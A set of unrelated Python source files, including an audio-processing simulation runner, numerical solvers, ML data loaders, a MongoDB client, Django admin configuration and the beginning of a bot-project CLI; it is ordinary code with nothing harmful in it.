self._render_input_filepaths is None # Try different APM config files. for config_name in self._config_filepaths: config_filepath = self._config_filepaths[config_name] # Try different capture-render pairs. for capture_input_name in self._capture_input_filepaths: # Output path for the capture signal annotations. capture_annotations_cache_path = os.path.join( self._output_cache_path, self._PREFIX_CAPTURE + capture_input_name) data_access.MakeDirectory(capture_annotations_cache_path) # Capture. capture_input_filepath = self._capture_input_filepaths[ capture_input_name] if not os.path.exists(capture_input_filepath): # If the input signal file does not exist, try to create using the # available input signal creators. self._CreateInputSignal(capture_input_filepath) assert os.path.exists(capture_input_filepath) self._ExtractCaptureAnnotations( capture_input_filepath, capture_annotations_cache_path) # Render and simulated echo path (optional). render_input_filepath = None if without_render_input else ( self._render_input_filepaths[capture_input_name]) render_input_name = '(none)' if without_render_input else ( self._ExtractFileName(render_input_filepath)) echo_path_simulator = ( echo_path_simulation_factory.EchoPathSimulatorFactory.GetInstance( self._echo_path_simulator_class, render_input_filepath)) # Try different test data generators. for test_data_generators in self._test_data_generators: logging.info('APM config preset: <%s>, capture: <%s>, render: <%s>,' 'test data generator: <%s>, echo simulator: <%s>', config_name, capture_input_name, render_input_name, test_data_generators.NAME, echo_path_simulator.NAME) # Output path for the generated test data. test_data_cache_path = os.path.join( capture_annotations_cache_path, self._PREFIX_TEST_DATA_GEN + test_data_generators.NAME) data_access.MakeDirectory(test_data_cache_path) logging.debug('test data cache path: <%s>', test_data_cache_path) # Output path for the echo simulator and APM input mixer output. echo_test_data_cache_path = os.path.join( test_data_cache_path, 'echosim-{}'.format( echo_path_simulator.NAME)) data_access.MakeDirectory(echo_test_data_cache_path) logging.debug('echo test data cache path: <%s>', echo_test_data_cache_path) # Full output path. output_path = os.path.join( self._base_output_path, self._PREFIX_APM_CONFIG + config_name, self._PREFIX_CAPTURE + capture_input_name, self._PREFIX_RENDER + render_input_name, self._PREFIX_ECHO_SIMULATOR + echo_path_simulator.NAME, self._PREFIX_TEST_DATA_GEN + test_data_generators.NAME) data_access.MakeDirectory(output_path) logging.debug('output path: <%s>', output_path) self._Simulate(test_data_generators, capture_input_filepath, render_input_filepath, test_data_cache_path, echo_test_data_cache_path, output_path, config_filepath, echo_path_simulator) @staticmethod def _CreateInputSignal(input_signal_filepath): """Creates a missing input signal file. The file name is parsed to extract input signal creator and params. If a creator is matched and the parameters are valid, a new signal is generated and written in |input_signal_filepath|. Args: input_signal_filepath: Path to the input signal audio file to write. Raises: InputSignalCreatorException """ filename = os.path.splitext(os.path.split(input_signal_filepath)[-1])[0] filename_parts = filename.split('-') if len(filename_parts) < 2: raise exceptions.InputSignalCreatorException( 'Cannot parse input signal file name') signal, metadata = input_signal_creator.InputSignalCreator.Create( filename_parts[0], filename_parts[1].split('_')) signal_processing.SignalProcessingUtils.SaveWav( input_signal_filepath, signal) data_access.Metadata.SaveFileMetadata(input_signal_filepath, metadata) def _ExtractCaptureAnnotations(self, input_filepath, output_path, annotation_name=""): self._annotator.Extract(input_filepath) self._annotator.Save(output_path, annotation_name) def _Simulate(self, test_data_generators, clean_capture_input_filepath, render_input_filepath, test_data_cache_path, echo_test_data_cache_path, output_path, config_filepath, echo_path_simulator): """Runs a single set of simulation. Simulates a given combination of APM configuration, probing signal, and test data generator. It iterates over the test data generator internal configurations. Args: test_data_generators: TestDataGenerator instance. clean_capture_input_filepath: capture input audio track file to be processed by a test data generator and not affected by echo. render_input_filepath: render input audio track file to test. test_data_cache_path: path for the generated test audio track files. echo_test_data_cache_path: path for the echo simulator. output_path: base output path for the test data generator. config_filepath: APM configuration file to test. echo_path_simulator: EchoPathSimulator instance. """ # Generate pairs of noisy input and reference signal files. test_data_generators.Generate( input_signal_filepath=clean_capture_input_filepath, test_data_cache_path=test_data_cache_path, base_output_path=output_path) # Extract metadata linked to the clean input file (if any). apm_input_metadata = None try: apm_input_metadata = data_access.Metadata.LoadFileMetadata( clean_capture_input_filepath) except IOError as e: apm_input_metadata = {} apm_input_metadata['test_data_gen_name'] = test_data_generators.NAME apm_input_metadata['test_data_gen_config'] = None # For each test data pair, simulate a call and evaluate. for config_name in test_data_generators.config_names: logging.info(' - test data generator config: <%s>', config_name) apm_input_metadata['test_data_gen_config'] = config_name # Paths to the test data generator output. # Note that the reference signal does not depend on the render input # which is optional. noisy_capture_input_filepath = ( test_data_generators.noisy_signal_filepaths[config_name]) reference_signal_filepath = ( test_data_generators.reference_signal_filepaths[config_name]) # Output path for the evaluation (e.g., APM output file). evaluation_output_path = test_data_generators.apm_output_paths[ config_name] # Paths to the APM input signals. echo_path_filepath = echo_path_simulator.Simulate( echo_test_data_cache_path) apm_input_filepath = input_mixer.ApmInputMixer.Mix( echo_test_data_cache_path, noisy_capture_input_filepath, echo_path_filepath) # Extract annotations for the APM input mix. apm_input_basepath, apm_input_filename = os.path.split( apm_input_filepath) self._ExtractCaptureAnnotations( apm_input_filepath, apm_input_basepath, os.path.splitext(apm_input_filename)[0] + '-') # Simulate a call using APM. self._audioproc_wrapper.Run( config_filepath=config_filepath, capture_input_filepath=apm_input_filepath, render_input_filepath=render_input_filepath, output_path=evaluation_output_path) try: # Evaluate. self._evaluator.Run( evaluation_score_workers=self._evaluation_score_workers, apm_input_metadata=apm_input_metadata, apm_output_filepath=self._audioproc_wrapper.output_filepath, reference_input_filepath=reference_signal_filepath, render_input_filepath=render_input_filepath, output_path=evaluation_output_path, ) # Save simulation metadata. data_access.Metadata.SaveAudioTestDataPaths( output_path=evaluation_output_path, clean_capture_input_filepath=clean_capture_input_filepath, echo_free_capture_filepath=noisy_capture_input_filepath, echo_filepath=echo_path_filepath, render_filepath=render_input_filepath, capture_filepath=apm_input_filepath, apm_output_filepath=self._audioproc_wrapper.output_filepath, apm_reference_filepath=reference_signal_filepath, apm_config_filepath=config_filepath, ) except exceptions.EvaluationScoreException as e: logging.warning('the evaluation failed: %s', e.message) continue def _SetTestInputSignalFilePaths(self, capture_input_filepaths, render_input_filepaths): """Sets input and render input file paths collections. Pairs the input and render input files by storing the file paths into two collections. The key is the file name of the input file. Args: capture_input_filepaths: list of file paths. render_input_filepaths: list of file paths. """ self._capture_input_filepaths = {} self._render_input_filepaths = {} assert len(capture_input_filepaths) == len(render_input_filepaths) for capture_input_filepath, render_input_filepath in zip( capture_input_filepaths, render_input_filepaths): name = self._ExtractFileName(capture_input_filepath) self._capture_input_filepaths[name] = os.path.abspath( capture_input_filepath) self._render_input_filepaths[name] = os.path.abspath( render_input_filepath) @classmethod def _CreatePathsCollection(cls, filepaths): """Creates a collection of file paths. Given a list of file paths, makes a collection with one item for each file path. The value is absolute path, the key is the file name without extenstion. Args: filepaths: list of file paths. Returns: A dict. """ filepaths_collection = {} for filepath in filepaths: name = cls._ExtractFileName(filepath) filepaths_collection[name] = os.path.abspath(filepath) return filepaths_collection @classmethod def _ExtractFileName(cls, filepath): return os.path.splitext(os.path.split(filepath)[-1])[0]
"""Test the magic commands used to update variables and trace properties. We expect the correct updates to be performed when a valid input is given, and the correct warnings to be shown when an invalid one is. """ import pytest from tests.unit.autoplot.mocks import COL, DF, DF_COL, DF_COL_ALT, VAR @pytest.mark.parametrize("initial,final", [(VAR, "new"), (VAR, "my var"), (VAR, "m1 var!"), (DF_COL, "c")]) def test_rename_valid_names(initial, final, full_autoplot_magic): magic = full_autoplot_magic() magic.autoplot(f"--rename '{initial}' '{final}'") # test label set to correct value assert magic.view_manager.active_view._plotter[initial].get_label() == final assert magic.view_manager.active_view._plotter._changed def test_rename_dataframe(full_autoplot_magic): initial = DF final = "new" magic = full_autoplot_magic() magic.autoplot(f"--rename {initial} {final}") # test label set to correct value assert magic.view_manager.active_view._plotter[DF_COL].get_label() == DF_COL.replace(initial, final) assert magic.view_manager.active_view._plotter[DF_COL_ALT].get_label() == DF_COL_ALT.replace(initial, final) @pytest.mark.parametrize("initial", ["undef", "", COL]) def test_rename_undefined_variable(mock_toast, initial, full_autoplot_magic): toast = mock_toast magic = full_autoplot_magic(toast) magic.autoplot(f"--rename '{initial}' new") # test plotter not changed and toast show assert not magic.view_manager.active_view._plotter._changed toast.unrecognised_variable.assert_called_once_with(initial)
a=[1,34,45,23,47,56,32,24,13,67,98,90,77,76,3,2] o=[] e=[] for i in range(0,len(a)): if (a[i]%2==0): e.append(a[i]) else: o.append(a[i]) print("The odd values are",o) print("The even values are",e) print("ascending order of numbers: ") e.sort() o.sort() print("EVEN NUMBERS",e) print("ODD NUMBERS",o) """for i in range(0,len(o)-1): if o[i]<o[i+1]: # print(o[i]) print("") else: t=o[i] o[i]=o[i+1] o[i+1]=t for i in range(len(o)): print(o[i],end=" ") print("\nascending order of even numbers: ") for i in range(0,len(e)-1): if e[i]<e[i+1]: # print(e[i]) print("") else: t=e[i] e[i]=e[i+1] e[i+1]=t for i in range(len(e)): print(e[i],end=" ") #print(o[i]) #print("The ascending of odd numbers: ",o)"""
import os import numpy as np import numpy import sys import tensorflow as tf import dirt import skimage.io canvas_width, canvas_height = 960, 640 def get_dirt_pixels_render(render_op, par_dims=8): square_vertices = tf.constant([[-1, -1, 0, 1], [-1, 1, 0, 1], [1, 1, 0, 1], [1, -1, 0, 1]], dtype=tf.float32) background = tf.random_normal([canvas_height, canvas_width, 3], dtype=tf.float32) dirt_op = getattr(dirt, render_op) camera_pos = tf.placeholder(tf.float32, par_dims) return dirt_op( vertices=square_vertices, faces=[[0, 1, 2], [0, 2, 3]], vertex_colors=tf.ones([4, 3]), background=background, camera_pos = camera_pos, height=canvas_height, width=canvas_width, channels=3 ), camera_pos, background def get_par_dims(render_op): if render_op == 'oceanic_still_cloud': par_dims = 9 else: par_dims = 8 return par_dims def main(): assert len(sys.argv) > 5 outdir = sys.argv[1] prefix = sys.argv[2] simple_render_op = sys.argv[3] complex_render_op = sys.argv[4] nvideos = int(sys.argv[5]) nframes_per_video = 30 framerate = 30 simple_par_dims = get_par_dims(simple_render_op) complex_par_dims = get_par_dims(complex_render_op) global canvas_width, canvas_height if complex_render_op.startswith('ocean'): canvas_width = 960 canvas_height = 540 nsamples = 100 else: canvas_width = 1024 canvas_height = 768 nsamples = 1 render_par_vals = np.empty([nvideos, nframes_per_video, max(simple_par_dims, complex_par_dims)]) ans = get_dirt_pixels_render(simple_render_op, simple_par_dims) simple_render_node = ans[0] simple_camera_pos = ans[1] ans = get_dirt_pixels_render(complex_render_op, complex_par_dims) complex_render_node = ans[0] complex_camera_pos = ans[1] sess = tf.Session() img = np.empty([canvas_height, canvas_width, 3]) feed_dict = {} simple_camera_pos_val = np.empty(simple_par_dims) complex_camera_pos_val = np.empty(complex_par_dims) speed_max = np.zeros(6) # x speed speed_max[0] = 150.0 # y speed speed_max[1] = 50.0 # z speed speed_max[2] = 150.0 # ang1 speed speed_max[3] = 0.1 # ang2 speed speed_max[4] = 0.2 # ang3 speed speed_max[5] = 0.1 speed_max /= 2 def h00(t): return 2 * t ** 3 - 3 * t ** 2 + 1 def h10(t): return t ** 3 - 2 * t ** 2 + t def h01(t): return -2 * t ** 3 + 3 * t ** 2 def h11(t): return t ** 3 - t ** 2 for ind_v in range(nvideos): ini_camera_pos_val = np.random.random(9) ini_camera_pos_scale = np.array([1000, 500, 1000, 0.4, 2*np.pi, 0.4, 180, 2.0, 180]) ini_camera_pos_bias = np.array([0, 100, 0, -0.1, 0, -0.2, 0.0, 0.2, 0.0]) ini_camera_pos_val *= ini_camera_pos_scale ini_camera_pos_val += ini_camera_pos_bias ini_camera_pos_only = ini_camera_pos_val[:6] speed1 = np.random.random(6) * 2.0 * speed_max - speed_max speed2 = np.random.random(6) * 2.0 * speed_max - speed_max mid_camera_pos_only = ini_camera_pos_only + speed1 * nframes_per_video / 2 / framerate final_camera_pos_only = mid_camera_pos_only + speed2 * nframes_per_video / 2 / framerate interp_p = [ini_camera_pos_only, mid_camera_pos_only, final_camera_pos_only] interp_unscaled_m = [np.random.random(6) * 2.0 * speed_max - speed_max, final_camera_pos_only - ini_camera_pos_only, np.random.random(6) * 2.0 * speed_max - speed_max] #interp_unscaled_m = [np.zeros(6), final_camera_pos_only - ini_camera_pos_only, np.zeros(6)] for ind_f in range(nframes_per_video): if ind_f < nframes_per_video / 2: p0 = interp_p[0] p1 = interp_p[1] m0 = interp_unscaled_m[0] / (nframes_per_video) m1 = interp_unscaled_m[1] / (nframes_per_video) t = ind_f else: p0 = interp_p[1] p1 = interp_p[2] m0 = interp_unscaled_m[1] / (nframes_per_video) m1 = interp_unscaled_m[2] / (nframes_per_video) t = ind_f - nframes_per_video / 2 t_scale = nframes_per_video / 2 t /= t_scale simple_camera_pos_val[:6] = h00(t) * p0 + \ h10(t) * m0 * t_scale + \ h01(t) * p1 + \ h11(t) * m1 * t_scale complex_camera_pos_val[:6] = simple_camera_pos_val[:6] simple_camera_pos_val[6] = ini_camera_pos_val[6] + ind_f / framerate complex_camera_pos_val[6] = simple_camera_pos_val[6] simple_camera_pos_val[7:] = ini_camera_pos_val[7:simple_par_dims] complex_camera_pos_val[7:] = ini_camera_pos_val[7:complex_par_dims] render_par_vals[ind_v, ind_f, :simple_par_dims] = simple_camera_pos_val[:] render_par_vals[ind_v, ind_f, :complex_par_dims] = complex_camera_pos_val[:] feed_dict[simple_camera_pos] = simple_camera_pos_val img[:] = 0.0 for _ in range(nsamples): dirt_pixels = sess.run(simple_render_node, feed_dict=feed_dict) img += dirt_pixels img /= nsamples skimage.io.imsave(os.path.join(outdir, '%s_%05d_simple_%05d.png' % (prefix, ind_v, ind_f)), np.clip(img, 0.0, 1.0)) feed_dict[complex_camera_pos] = complex_camera_pos_val img[:] = 0.0 for _ in range(nsamples): dirt_pixels = sess.run(complex_render_node, feed_dict=feed_dict) img += dirt_pixels img /= nsamples skimage.io.imsave(os.path.join(outdir, '%s_%05d_complex_%05d.png' % (prefix, ind_v, ind_f)), np.clip(img, 0.0, 1.0)) print(ind_v, ind_f) np.save(os.path.join(outdir, '%s_camera_pos.npy' % prefix), render_par_vals) if __name__ == '__main__': main()
from subprocess import call import sys action = ['Greeting','Sitting','SittingDown','WalkTogether','Phoning','Posing','WalkDog','Walking','Purchases','Waiting','Directions','Smoking','Photo','Eating','Discussion'] group = [1, 2, 3, 5] for i in action: cmd = """nohup python -u run.py --model srnet -arc 1,1,1 --use-action-split True --train-action {} -mn sr_t1_crossaction_act{} > log/sr_t1_crossaction_act{}.log 2>&1&""".format(i,i,i) print(cmd) call(cmd, shell=True) print('Finish!')
import numpy def solve_tridiagonal_system(N, a, b, c, r): """Efficiently solve a tridiagonal system. For example if, x + y = 3 y + z = 5 y + 2z = 8 then, A = 3x3 [ 1 1 0 0 1 1 0 1 2 ] and r = [ 3, 5, 8 ]' for which the expected result is x = [1, 2, 3]. >>> a, b, c = [None, 0, 1], [1, 1, 2], [1, 1, None] >>> r =[3, 5, 8] >>> print solve_tridiagonal_system(3, a, b, c, r) [ 1. 2. 3.] """ u, gam = numpy.zeros(N), numpy.zeros(N) bet = b[0] if bet == 0.0: raise RuntimeError, "Solve diagonal system error" u[0] = r[0]/bet for j in range(1, N): gam[j] = c[j - 1]/bet bet = b[j]- a[j]*gam[j] if bet == 0.0: raise RuntimeError, "Solve diagonal system error" u[j] = (r[j] - a[j]*u[j - 1])/bet for j in range(N - 2, -1, -1): u[j] -= gam[j + 1]*u[j + 1] return u def solve_upper_diagonal_system(a, b): """Efficiently solve an upper diagonal system. For example, if A = 3 x 3 [ 1.75 1.5 -2.5 0 -0.5 0.65 0 0 0.25 ] and b = [ 0.5 -1 3.5], the expected result is x = [2.97142857 20.2 14]. >>> from numpy import * >>> A = matrix(array( ... [[1.75, 1.5, -2.5], ... [0.0, -0.5, 0.65], ... [0.0, 0.0, 0.25]], float)) >>> A matrix([[ 1.75, 1.5 , -2.5 ], [ 0. , -0.5 , 0.65], [ 0. , 0. , 0.25]]) >>> b = array([0.5, -1.0, 3.5]) >>> b array([ 0.5, -1. , 3.5]) >>> x = solve_upper_diagonal_system(A, b) >>> x = matrix(x).transpose() # column vector >>> x matrix([[ 2.97142857], [ 20.2 ], [ 14. ]]) >>> A*x #matrix vector product matrix([[ 0.5], [-1. ], [ 3.5]]) """ if len(a.shape) <> 2: raise RuntimeError, "Expected 'a' to be a matrix" if a.shape[0] <> a.shape[1]: raise RuntimeError, "Expected 'a' to be a square matrix" if len(b.shape) <> 1: raise RuntimeError, "Expected 'b' to be a column vector" if b.shape[0] <> a.shape[0]: raise RuntimeError, "Expected 'b' to be a column vector" N = a.shape[0] for i in range(N): if a[i, i] == 0.0: raise RuntimeError, "Singular upper diagonal matrix" for j in range(0, i): if a[i, j] <> 0.0: raise RuntimeError, "Matrix not upper diagonal" x = numpy.zeros(N) for i in range(N-1, -1, -1): tmp = 0.0 for j in range(i+1, N): tmp += a[i, j]*x[j] x[i] = (b[i]-tmp)/a[i, i] return x def singular_value_decomposition_back_substitution(u, w, v, b): """Solve an upper diagonal system using svd. For example, if A = 3 x 3 [ 1.75 1.5 -2.5 0 -0.5 0.65 0 0 0.25 ] and b = [ 0.5 -1 3.5], the expected result is x = [2.97142857 20.2 14]. >>> from numpy import * >>> from numpy.linalg import svd >>> A = matrix(array( ... [[1.75, 1.5, -2.5], ... [0.0, -0.5, 0.65], ... [0.0, 0.0, 0.25]], float)) >>> A matrix([[ 1.75, 1.5 , -2.5 ], [ 0. , -0.5 , 0.65], [ 0. , 0. , 0.25]]) >>> b = array([0.5, -1.0, 3.5]) >>> b array([ 0.5, -1. , 3.5]) >>> u, w, v = svd(A) >>> x = singular_value_decomposition_back_substitution(u, w, v, b) >>> x = matrix(x).transpose() # column vector >>> x matrix([[ 2.97142857], [ 20.2 ], [ 14. ]]) """ if len(u.shape) <> 2: raise RuntimeError, "Expected 'u' to be a matrix" if len(w.shape) <> 1: raise RuntimeError, "Expected 'w' to be a column vector" if len(v.shape) <> 2: raise RuntimeError, "Expected 'v' to be a matrix" if len(b.shape) <> 1: raise RuntimeError, "Expected 'b' to be a column vector" m = u.shape[0] n = u.shape[1] if w.shape[0] <> n: raise RuntimeError, "'w' column vector has incorrect size" if b.shape[0] <> m: raise RuntimeError, "'b' column vector has incorrect size" if v.shape[0] <> n or v.shape[1] <> n: raise RuntimeError, "'v' matrix has incorrect size" tmp = numpy.zeros(n) for j in range(n): s = 0.0 if w[j] <> 0: for i in range(m): s += u[i, j]*b[i] s /= w[j] tmp[j] = s x = numpy.zeros(n) for j in range(n): s = 0.0 for jj in range(n): s += v[jj, j]*tmp[jj] x[j] = s return x def _test(): import doctest doctest.testmod() if __name__ == '__main__': _test()
''' @author Tian Shi Please contact tshi@vt.edu ''' import json import torch from torch.autograd import Variable from transformers import BertTokenizer from .model_base import modelClassificationBase tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') class modelClassificationBaseBert(modelClassificationBase): ''' Classfication. Rewrite vocabulary module. Use Bert encoder. ''' def __init__(self, args): super().__init__(args=args) self.pretrained_models = {} def build_vocabulary(self): ''' vocabulary ''' pass def build_batch(self, batch_): ''' get batch data ''' len_review = [] review_arr = [] rating_arr = [] for line in batch_: arr = json.loads(line) rating_arr.append(int(arr['label'])) toks = tokenizer.encode(arr['text']) len_review.append(len(toks)) review_arr.append(toks) review_lens = min(self.args.review_max_lens, max(len_review)) review_arr = [itm[:review_lens] for itm in review_arr] review_arr = [itm + [0 for _ in range(review_lens-len(itm))] for itm in review_arr] review_var = Variable(torch.LongTensor(review_arr)) rating_var = Variable(torch.LongTensor(rating_arr)) pad_mask = Variable(torch.FloatTensor(review_arr)) pad_mask[pad_mask != float(0)] = -1.0 pad_mask[pad_mask == float(0)] = 0.0 pad_mask = -pad_mask attn_mask = Variable(torch.FloatTensor(review_arr)) attn_mask[attn_mask == float(101)] = 0.0 attn_mask[attn_mask == float(102)] = 0.0 attn_mask[attn_mask != float(0)] = -1.0 attn_mask[attn_mask == float(0)] = 0.0 attn_mask = -attn_mask self.batch_data['input_ids'] = review_var.to(self.args.device) self.batch_data['label'] = rating_var.to(self.args.device) self.batch_data['attn_mask'] = attn_mask.to(self.args.device) self.batch_data['pad_mask'] = pad_mask.to(self.args.device)
def pairs(k, arr): """Hackerrank Problem: https://www.hackerrank.com/challenges/pairs/problem You will be given an array of integers and a target value. Determine the number of pairs of array elements that have a difference equal to a target value. Args: k (int): The target difference arr (list): list of integers Returns: int: number of pairs of integers whose difference is k """ vals = {i: 1 for i in arr} count = 0 for i in arr: try: count += vals[i + k] except KeyError: pass return count if __name__ == "__main__": assert pairs(2, [1, 5, 3, 4, 2]) == 3
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sun Feb 27 18:32:12 2022 Autor: Carlos Armando De Castro (cadecastro.com) """ def interpolacion_lagrange(x,y,xi): yi=0 N=len(x) for i in range(0,N): L=1 for j in range(0,N): if j!=i: L=L*(xi-x[j])/(x[i]-x[j]) yi=yi+L*y[i] return yi
# Copyright 2015 Rackspace # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import pymongo from pymongo import MongoClient from cafe.common.reporting import cclogging from cafe.engine.clients.base import BaseClient class BaseMongoClient(BaseClient): """ @summary: Designed to be a simple interface to make calls to MongoDB """ FAILED = 'failed' SUCCESS = 'success' _log = cclogging.getLogger(__name__) def __init__(self, hostname, db_name, username, password): super(BaseMongoClient, self).__init__() self.hostname = hostname self.db_name = db_name self.username = username self.password = password self.connection = None self.db = None @classmethod def from_connection_string(cls, uri): params = pymongo.uri_parser.parse_uri(uri) hosts = params.get('nodelist') if len(hosts) == 0: raise Exception("Invalid connection string: {uri}".format( uri=uri)) host, port = hosts[0] return cls(hostname=host, db_name=params.get('database'), username=params.get('username'), password=params.get('password')) def is_connected(self): if self.connection: return self.connection.alive() return False def connect(self, hostname=None, db_name=None): """ @summary: Connects to a server, but does not authenticate. @param hostname: if not specified it'll attempt to use init hostname @param db_name: if not specified it'll attempt to use init db_name @return: """ if hostname is None: hostname = self.hostname if db_name is None: db_name = self.db_name self.connection = MongoClient(hostname) self.db = self.connection[db_name] result = 'Connected' if self.is_connected() else 'Failed to connect' self._log.debug('{0} to MongoDB: {1}'.format(result, hostname)) return self.SUCCESS if self.is_connected() else self.FAILED def disconnect(self): self.connection.close() self._log.debug('Disconnected from MongoDB') def auth(self, username=None, password=None): """ @summary: Attempts to auth with a connected db. Returns FAILED if there isn't an active connection. @param username: if not specified it'll attempt to use init username @param password: if not specified it'll attempt to use init password @return: """ if not self.is_connected(): return self.FAILED if username is None: username = self.username if password is None: password = self.password if username and password: self.db.authenticate(name=username, password=password) return self.SUCCESS def find_one(self, db_obj_name, filter=None): result_filter = filter or dict() if not self.is_connected(): return self.FAILED db_obj = self.db[db_obj_name] return db_obj.find_one(result_filter) def delete(self, db_obj_name, filter=None, just_one=True): result_filter = filter or dict() if not self.is_connected(): return self.FAILED db_obj = self.db[db_obj_name] return db_obj.remove(result_filter, just_one)
import oneflow from oneflow.utils.data import Dataset import cv2 import os import glob import random class SelfDataSet(Dataset): def __init__(self, data_path): self.data_path = data_path self.imgs_path = glob.glob(os.path.join(data_path, "*.png")) def augment(self, image, flipcode): flip = cv2.flip(image, flipcode) return flip def __getitem__(self, index): image_path = self.imgs_path[index] label_path = image_path.replace("image", "label") image = cv2.imread(image_path) label = cv2.imread(label_path) image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) label = cv2.cvtColor(label, cv2.COLOR_BGR2GRAY) image = image.reshape(1, image.shape[0], image.shape[1]) label = label.reshape(1, label.shape[0], label.shape[1]) if label.max() > 1: label = label / 255 flipcode = random.choice([-1, 0, 1, 2]) if flipcode != 2: image = self.augment(image, flipcode) label = self.augment(label, flipcode) return image, label def __len__(self): return len(self.imgs_path) if __name__ == "__main__": data_path = "train_image" plate_dataset = SelfDataSet(data_path) print(len(plate_dataset)) train_loader = oneflow.utils.data.DataLoader( dataset=plate_dataset, batch_size=5, shuffle=True ) for image, label in train_loader: print(label.shape)
v = int(input()) # pool`s litters p1 = int(input()) # litters per hour p2 = int(input()) n = float(input()) # hours litters_p1 = p1 * n litters_p2 = p2 * n all_litters_from_p1_p2 = litters_p1 + litters_p2 percent_pool = all_litters_from_p1_p2 / v * 100 percent_p1 = litters_p1 / all_litters_from_p1_p2 * 100 percent_p2 = litters_p2 / all_litters_from_p1_p2 * 100 overflow_pool = all_litters_from_p1_p2 - v # препълнен if v >= all_litters_from_p1_p2: print(f"The pool is {percent_pool:.2f}% full. Pipe 1: {percent_p1:.2f}%. Pipe 2: {percent_p2:.2f}%.") elif v < all_litters_from_p1_p2: print(f"For {n:.2f} hours the pool overflows with {overflow_pool:.2f} liters.")
# This is an example of adding a custom plugin to Projeny # If you uncomment this then initialize a new project (for eg. "prj -p MyProject -bf") # Then after that completes there should be a new file at UnityProjects/MyProject/MyP-win/MyExampleFile.txt #import mtm.ioc.Container as Container #from mtm.ioc.Inject import Inject #class CustomProjectInitHandler: #_varMgr = Inject('VarManager') #def onProjectInit(self, projectName, platform): #outputPath = self._varMgr.expand('[ProjectPlatformRoot]/MyExampleFile.txt') #with open(outputPath, 'w') as f: #f.write("This is a sample of configuring the generated project directory") #Container.bind('ProjectInitHandlers').toSingle(CustomProjectInitHandler)
#!/USSR/bin/env python import argparse import biom from biom.util import biom_open import numpy as np import pandas as pd from scipy.sparse import coo_matrix import scipy as sp def main(args): table = biom.load_table(args.table) aligns = pd.read_table(args.align, header=None) seq_to_genome = aligns[[0, 2, 4]].groupby(by=[0]).min()[2] ids = list(set(seq_to_genome.index) & set(table.ids(axis='observation'))) t = table.filter(ids, axis='observation') bin_f = lambda i, x: seq_to_genome.loc[i] t = t.collapse(bin_f, norm=False, min_group_size=1, axis='observation') #t = groupby_sum(t, seq_to_genome) with biom_open(args.output_table, 'w') as f: t.to_hdf5(f, 'collapsed') if __name__ == "__main__": parser = argparse.ArgumentParser(add_help=True) parser.add_argument('--table', type=str, required=True, help='Path to biom table.') parser.add_argument('--align', type=str, required=True, help='Path to sam alignments.') parser.add_argument('--output-table', type=str, required=True, help='Path to output fasta file.') args = parser.parse_args() main(args)
import random import string class Helper: """ Helper function just to do some stuff. """ def get_random_string(self, length): """ Function to generate random string. """ letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length))
import requests import json import csv import sys # Stream List resp = requests.get('http://listen.di.fm/[streamlist]') resplist = resp.json() respsort = sorted(resplist, key=lambda k: k['name']) respfinal = [] for i in respsort: print(i['id'],"\t",i['name']) respfinal.append({'id': i['id'], 'name': i['name'], 'key': i['key']}) # Save Stream List to CSV with open('streamlist.csv', 'w') as csvfile: fieldnames = ['id', 'name', 'key'] writer = csv.DictWriter(csvfile, lineterminator='\n', fieldnames=fieldnames) writer.writeheader() for i in respfinal: writer.writerow(i) # Get Track List from Stream ID streamid = input("Enter Stream ID: ") tlurl = 'http://api.audioaddict.com/v1/di/track_history/channel/' + streamid resp = requests.get(tlurl) resplist = resp.json() respsort = sorted(resplist, key=lambda k: k['started']) respfinal = [] for i in respsort: if i['artist'] != None: if i['title'] != None: print(i['artist'],"-",i['title']) respfinal.append({'artist': i['artist'], 'title': i['title'], 'duration': i['duration'], 'started': i['started']}) # Save Track List to CSV with open('tracklist.csv', 'a') as csvfile: fieldnames = ['artist', 'title', 'duration', 'started'] writer = csv.DictWriter(csvfile, lineterminator='\n', fieldnames=fieldnames) writer.writeheader() # Removed while appending entries. for i in respfinal: writer.writerow(i)
from __future__ import unicode_literals from django.contrib import admin from django.contrib.contenttypes.admin import GenericTabularInline from django.utils.safestring import mark_safe from .models import Car, SubType, Transmission, Fuel from src.medias.models import Photo, Video class PhotoInline(GenericTabularInline): model = Photo extra = 3 max_num = 15 class VideoInline(GenericTabularInline): model = Video max_num = 1 class CarModelAdmin(admin.ModelAdmin): list_display = [ 'model', 'brand', 'year', 'sub_type', 'price', 'status', 'views', ] list_display_links = [ 'model', ] list_editable = [ 'brand', 'year', 'sub_type', 'price', 'status', ] list_filter = [ 'brand', 'model', 'sub_type', 'status', ] search_fields = [ 'brand', 'model', 'year', 'description', 'status', ] # fieldsets = [ # (_('Author'), {'fields': ['author','']}), # ('Date information', {'fields': ['pub_date'], 'classes': ['collapse']}), # ] readonly_fields = ["imagen_principal_del_carro"] def imagen_principal_del_carro(self, obj): return mark_safe('<img src="{url}" width="{width}" height={height} />'.format( url=obj.img.url, width=obj.img.width / 3, height=obj.img.height / 3, ) ) inlines = [PhotoInline] class Meta: model = Car admin.site.register(Car, CarModelAdmin) admin.site.register(SubType) admin.site.register(Fuel) admin.site.register(Transmission)
# library from click.decorators import command from pyngrok import ngrok import requests import json import click from click import echo, style from pyfiglet import Figlet, main import colorama import os.path import subprocess import shutil import os from time import sleep import sys # start banner = Figlet(font="slant") banner_txt = banner.renderText("RaRa") echo(style(banner_txt, fg='blue')) dirmain = os.path.dirname(os.path.abspath(__file__)) dirBot = dirmain+"\\Bot" # defs def copyDirectory(src, dest): try: shutil.copytree(src, dest) except shutil.Error as e: print('Directory not copied. Error: %s' % e) except OSError as e: print('Directory not copied. Error: %s' % e) def editfile(file, content): path = dirBot+'//'+file with open(path, "w") as f: f.write(content) def Botedit(port, token): editfile('tools/local/public.bat', f'@echo off\nrara public {port} ../../src/token.txt') editfile('tools/local/local.bat', f'@echo off\nrara php {port} ../../src') editfile( 'local.bat', f'@echo off\ncd tools/local\nstart cmd /c local.bat \npublic.bat') editfile('src/token.txt', token) def creatproject(name, port, token): Botedit(port, token) copyDirectory(dirBot, name) def token_read(path): f = open(path, 'r') return f.read() @click.group(chain=True) 